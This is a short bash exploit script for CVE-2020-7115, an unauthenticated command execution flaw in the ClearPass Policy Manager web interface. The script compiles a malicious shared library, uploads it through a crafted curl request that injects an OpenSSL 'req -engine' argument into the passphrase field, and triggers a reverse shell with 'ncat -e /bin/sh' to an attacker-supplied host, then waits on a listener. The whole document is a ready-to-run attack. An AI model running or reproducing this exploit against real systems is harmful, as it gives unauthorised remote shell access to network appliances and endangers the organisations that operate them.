#!/usr/bin/env bash # ClearPass Policy Manager Unauthenticated Remote Command Execution in the WebUI (CVE-2020-7115) # For best results use OpenSSL/libcrypto shipped with RHEL/CentOS 7.x. # Questions? Contact spicyitalian@protonmail.com. if [ "$#" -ne 4 ]; then echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]" exit 0 fi cat <>payload.c #include __attribute__((constructor)) static void init() { execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL); } EOF gcc -fPIC -c payload.c gcc -shared -o payload.so -lcrypto payload.o rm -f payload.c payload.o curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null & ncat -v -l $3 $4